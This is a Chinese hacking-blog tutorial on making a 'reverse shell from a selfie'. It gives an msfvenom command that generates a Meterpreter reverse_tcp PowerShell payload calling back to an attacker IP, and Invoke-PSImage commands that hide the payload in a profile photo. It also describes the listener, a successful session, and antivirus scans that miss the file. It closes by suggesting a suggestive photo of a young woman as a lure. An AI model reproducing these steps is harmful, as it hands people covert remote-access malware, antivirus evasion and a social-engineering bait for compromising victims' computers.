关注我们

利用自拍照反弹shell

LzersLzers 安全文摘 2019-07-03 646799 1

0x00:前言

    继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。

0x01:过程

    利用工具:https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11LPORT=6666 -f psh-reflection -o /root/luomiweixiong.ps1

利用自拍照反弹shell

利用msf生成ps1脚本

二、找一张自拍图

(我这里用我自己的头像)

利用自拍照反弹shell

luomiweixiong.png

    放在Invoke-PSImage目录下,方便执行命令的时候找文件

三、两者合并

    

利用自拍照反弹shell

两者合并

解释:

1、首先要执行“Import-Module.\Invoke-PSImage.ps1”命令。
2、再执行“Invoke-PSImage-Script.\luomiweixiong.ps1-Image.\luomiweixiong.png-Out.\luomiwexiong2.png“命令进行两者合并。

    第1个解释中的命令解释:导入模块。

    第2个解释中的命令分解:luomiweixiong.ps1为msf生成的ps1文件。luomiweixiong.png为原来的头像文件。luomiwexiong2.png为生成后的头像文件。

    

利用自拍照反弹shell

生成后的文件会比原来的大。emmm  大

重点是  还是显示原来的头像

四、监听

利用自拍照反弹shell

老生常谈的方式,不会的请出门左转.

百度一下

五、见证奇迹

exploit开始攻击

运行生成后的"luomiweixiong2.png"文件,查看效果

利用自拍照反弹shell

   是的。没错。获取到会话了

六、查杀

1、本地查杀    2345安全卫士表示没问题

利用自拍照反弹shell

2、在线查杀

利用自拍照反弹shell

表示没有压力

0x02:后话

    其实还可以更加隐蔽的合并两者,并有更好的效果。比如诱人的小姐姐私房自拍照。

文由微信公众号洛米唯熊

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢2发布评论

1条评论

  • leezp 发表于 4个月前

    为啥生成了图片双击没反应,是某个编辑器漏洞吗,触发条件?

    #1

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址